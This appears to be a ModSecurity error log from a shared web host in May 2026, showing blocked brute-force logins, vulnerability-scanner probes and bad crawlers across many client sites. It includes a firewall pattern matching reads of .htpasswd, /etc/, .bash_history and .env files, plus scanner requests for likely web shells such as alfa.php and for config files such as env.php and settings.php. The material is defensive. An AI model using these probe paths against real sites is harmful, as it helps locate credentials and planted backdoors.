[Tue May 26 13:10:20.940866 2026] [security2:error] [pid 496740:tid 496979] [client 62.60.130.228:59898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVOZOvOeft4ltnLrH4jJQAAAG0"], referer: https://duckduckgo.com/
[Tue May 26 13:10:21.274727 2026] [security2:error] [pid 496740:tid 496942] [client 62.60.130.228:64268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVOZevOeft4ltnLrH4jRAAAAEg"], referer: https://www.facebook.com/
[Tue May 26 13:10:24.468597 2026] [security2:error] [pid 496740:tid 496878] [client 62.60.130.228:58751] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVOaOvOeft4ltnLrH4jxwAAAAg"], referer: https://www.google.com/
[Tue May 26 13:10:25.455581 2026] [security2:error] [pid 496740:tid 496895] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOaevOeft4ltnLrH4j5AAAABk"]
[Tue May 26 13:10:26.214693 2026] [security2:error] [pid 496740:tid 496790] [remote 34.235.6.233:42508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.6.235.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVOauvOeft4ltnLrH4kEgAADTE"]
[Tue May 26 13:10:28.412024 2026] [security2:error] [pid 496740:tid 496997] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVObOvOeft4ltnLrH4kXQAAAH8"]
[Tue May 26 13:10:29.506030 2026] [security2:error] [pid 496740:tid 496915] [client 172.202.92.73:44756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVObevOeft4ltnLrH4klAAAAC0"]
[Tue May 26 13:10:29.506143 2026] [security2:error] [pid 496740:tid 496915] [client 172.202.92.73:44756] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVObevOeft4ltnLrH4klAAAAC0"]
[Tue May 26 13:10:29.898409 2026] [security2:error] [pid 496740:tid 496975] [client 31.36.0.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVObevOeft4ltnLrH4kmgAAAGk"]
[Tue May 26 13:10:30.855599 2026] [security2:error] [pid 496740:tid 496995] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVObuvOeft4ltnLrH4kxAAAAH0"]
[Tue May 26 13:10:30.873384 2026] [security2:error] [pid 496740:tid 496816] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/etc/clientlibs"] [unique_id "ahVObuvOeft4ltnLrH4k0gAAOEs"]
[Tue May 26 13:10:31.048128 2026] [security2:error] [pid 496740:tid 496815] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/etc/designs"] [unique_id "ahVOb-vOeft4ltnLrH4k0wAAZko"]
[Tue May 26 13:10:31.222808 2026] [security2:error] [pid 496740:tid 496782] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/etc/packages"] [unique_id "ahVOb-vOeft4ltnLrH4k2gAAJyk"]
[Tue May 26 13:10:31.258117 2026] [security2:error] [pid 496740:tid 496897] [client 172.202.92.73:58996] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/admin.php"] [unique_id "ahVOb-vOeft4ltnLrH4k2wAAABs"]
[Tue May 26 13:10:31.258249 2026] [security2:error] [pid 496740:tid 496897] [client 172.202.92.73:58996] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/admin.php"] [unique_id "ahVOb-vOeft4ltnLrH4k2wAAABs"]
[Tue May 26 13:10:31.397427 2026] [security2:error] [pid 496740:tid 496833] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/etc/replication"] [unique_id "ahVOb-vOeft4ltnLrH4k3wAAS1w"]
[Tue May 26 13:10:33.109209 2026] [security2:error] [pid 496740:tid 496931] [client 172.202.92.73:42888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/goods.php"] [unique_id "ahVOcevOeft4ltnLrH4lKgAAAD0"]
[Tue May 26 13:10:33.109324 2026] [security2:error] [pid 496740:tid 496931] [client 172.202.92.73:42888] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/goods.php"] [unique_id "ahVOcevOeft4ltnLrH4lKgAAAD0"]
[Tue May 26 13:10:33.137243 2026] [security2:error] [pid 496740:tid 496990] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOcOvOeft4ltnLrH4lEgAAAHg"]
[Tue May 26 13:10:33.746652 2026] [security2:error] [pid 496740:tid 496793] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/core/install.php"] [unique_id "ahVOcevOeft4ltnLrH4lnwAAAzQ"]
[Tue May 26 13:10:33.919809 2026] [security2:error] [pid 496740:tid 496783] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/update.php"] [unique_id "ahVOcevOeft4ltnLrH4lqwAAcSo"]
[Tue May 26 13:10:34.466560 2026] [security2:error] [pid 496740:tid 496833] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/sites/default/settings.php"] [unique_id "ahVOcuvOeft4ltnLrH4lvAAATlw"]
[Tue May 26 13:10:35.248404 2026] [security2:error] [pid 496740:tid 496923] [client 172.224.240.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVOcevOeft4ltnLrH4lmwAAADU"]
[Tue May 26 13:10:35.550901 2026] [security2:error] [pid 496740:tid 496894] [client 172.202.92.73:58995] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/public/css.php"] [unique_id "ahVOc-vOeft4ltnLrH4l6gAAABg"]
[Tue May 26 13:10:35.551016 2026] [security2:error] [pid 496740:tid 496894] [client 172.202.92.73:58995] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/public/css.php"] [unique_id "ahVOc-vOeft4ltnLrH4l6gAAABg"]
[Tue May 26 13:10:35.685042 2026] [security2:error] [pid 496740:tid 496895] [client 121.146.218.75:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVOc-vOeft4ltnLrH4l8wAAABk"], referer: http://www.anujtradingco.com/
[Tue May 26 13:10:35.782780 2026] [ssl:error] [pid 496740:tid 496954] [client 66.132.172.131:24468] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname www.yatirimfinans.cagmedya.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:10:36.439701 2026] [security2:error] [pid 496740:tid 496993] [client 121.146.218.75:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVOdOvOeft4ltnLrH4mDwAAAHs"], referer: http://www.anujtradingco.com/homepages/portfolio-photo/
[Tue May 26 13:10:36.582579 2026] [security2:error] [pid 496740:tid 496964] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOdOvOeft4ltnLrH4mBgAAAF4"]
[Tue May 26 13:10:37.020673 2026] [security2:error] [pid 496740:tid 496900] [client 172.202.92.73:48371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/alfa.php"] [unique_id "ahVOdevOeft4ltnLrH4mKAAAAB4"]
[Tue May 26 13:10:37.020799 2026] [security2:error] [pid 496740:tid 496900] [client 172.202.92.73:48371] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/alfa.php"] [unique_id "ahVOdevOeft4ltnLrH4mKAAAAB4"]
[Tue May 26 13:10:38.488403 2026] [security2:error] [pid 496740:tid 496870] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOduvOeft4ltnLrH4mVwAAAAA"]
[Tue May 26 13:10:38.842533 2026] [security2:error] [pid 496740:tid 496848] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/app/etc/env.php"] [unique_id "ahVOduvOeft4ltnLrH4mcwAAO2s"]
[Tue May 26 13:10:39.016238 2026] [security2:error] [pid 496740:tid 496770] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/app/etc/config.php"] [unique_id "ahVOd-vOeft4ltnLrH4mdgAAUB0"]
[Tue May 26 13:10:39.115836 2026] [security2:error] [pid 496740:tid 496948] [client 172.202.92.73:59005] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/css.php"] [unique_id "ahVOd-vOeft4ltnLrH4mgAAAAE4"]
[Tue May 26 13:10:39.115938 2026] [security2:error] [pid 496740:tid 496948] [client 172.202.92.73:59005] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/css.php"] [unique_id "ahVOd-vOeft4ltnLrH4mgAAAAE4"]
[Tue May 26 13:10:39.364843 2026] [security2:error] [pid 496740:tid 496771] [remote 88.198.165.116:38886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVOd-vOeft4ltnLrH4mggAASR4"]
[Tue May 26 13:10:40.997346 2026] [security2:error] [pid 496740:tid 496938] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOeOvOeft4ltnLrH4mvwAAAEQ"]
[Tue May 26 13:10:42.190369 2026] [security2:error] [pid 496740:tid 496882] [client 114.119.129.14:33913] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.acacia.org.in"] [uri "/robots.txt"] [unique_id "ahVOeuvOeft4ltnLrH4m_wAAAAw"]
[Tue May 26 13:10:42.274309 2026] [ssl:error] [pid 496740:tid 496992] [client 66.132.195.110:33406] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname bookmyitem.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:10:42.913940 2026] [security2:error] [pid 496740:tid 496883] [client 172.202.92.73:55725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/classwithtostring.php"] [unique_id "ahVOeuvOeft4ltnLrH4nHgAAAA0"]
[Tue May 26 13:10:42.914033 2026] [security2:error] [pid 496740:tid 496883] [client 172.202.92.73:55725] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/classwithtostring.php"] [unique_id "ahVOeuvOeft4ltnLrH4nHgAAAA0"]
[Tue May 26 13:10:43.386541 2026] [security2:error] [pid 496740:tid 496962] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOeuvOeft4ltnLrH4nIgAAAFw"]
[Tue May 26 13:10:45.313801 2026] [security2:error] [pid 496740:tid 496788] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/settings.inc.php"] [unique_id "ahVOfevOeft4ltnLrH4ngwAALC8"]
[Tue May 26 13:10:45.487245 2026] [security2:error] [pid 496740:tid 496786] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/defines.inc.php"] [unique_id "ahVOfevOeft4ltnLrH4nhwAATi0"]
[Tue May 26 13:10:45.660457 2026] [security2:error] [pid 496740:tid 496791] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/app/config/parameters.php"] [unique_id "ahVOfevOeft4ltnLrH4njgAACDI"]
[Tue May 26 13:10:46.585950 2026] [security2:error] [pid 496740:tid 496787] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/web/app.php"] [unique_id "ahVOfuvOeft4ltnLrH4nsgAAMy4"]
[Tue May 26 13:10:46.638391 2026] [security2:error] [pid 496740:tid 496894] [client 216.73.217.177:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVOfevOeft4ltnLrH4nggAAGHE"]
[Tue May 26 13:10:46.759144 2026] [security2:error] [pid 496740:tid 496806] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/web/app_dev.php"] [unique_id "ahVOfuvOeft4ltnLrH4nuAAAcUE"]
[Tue May 26 13:10:46.849230 2026] [security2:error] [pid 496740:tid 496956] [client 172.202.92.73:55181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/aa.php"] [unique_id "ahVOfuvOeft4ltnLrH4nugAAAFY"]
[Tue May 26 13:10:46.849374 2026] [security2:error] [pid 496740:tid 496956] [client 172.202.92.73:55181] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/aa.php"] [unique_id "ahVOfuvOeft4ltnLrH4nugAAAFY"]
[Tue May 26 13:10:46.932298 2026] [security2:error] [pid 496740:tid 496864] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/web/config.php"] [unique_id "ahVOfuvOeft4ltnLrH4nwgAAV3s"]
[Tue May 26 13:10:47.024184 2026] [security2:error] [pid 496740:tid 496968] [client 47.239.206.234:57846] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVOfevOeft4ltnLrH4niAAAAGI"], referer: http://huronwoodphysio.com/public/ui/met/images/dt-9.gif
[Tue May 26 13:10:47.128058 2026] [security2:error] [pid 496740:tid 496952] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOfuvOeft4ltnLrH4ntQAAAFI"]
[Tue May 26 13:10:48.276055 2026] [security2:error] [pid 496740:tid 496951] [client 47.239.206.234:57846] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVOgOvOeft4ltnLrH4n8gAAAFE"], referer: http://huronwoodphysio.com/public/images/metinfo.gif
[Tue May 26 13:10:48.724351 2026] [security2:error] [pid 496740:tid 496917] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOgOvOeft4ltnLrH4n-wAAAC8"]
[Tue May 26 13:10:49.920280 2026] [security2:error] [pid 496740:tid 496963] [client 14.186.240.119:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOgevOeft4ltnLrH4oMQAAAF0"]
[Tue May 26 13:10:50.408103 2026] [security2:error] [pid 496740:tid 496943] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOgevOeft4ltnLrH4oSgAAAEk"]
[Tue May 26 13:10:51.234346 2026] [security2:error] [pid 496740:tid 496956] [client 172.202.92.73:58964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/0x.php"] [unique_id "ahVOg-vOeft4ltnLrH4ogQAAAFY"]
[Tue May 26 13:10:51.234481 2026] [security2:error] [pid 496740:tid 496956] [client 172.202.92.73:58964] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/0x.php"] [unique_id "ahVOg-vOeft4ltnLrH4ogQAAAFY"]
[Tue May 26 13:10:53.579419 2026] [security2:error] [pid 496740:tid 496940] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOhevOeft4ltnLrH4o4gAAAEY"]
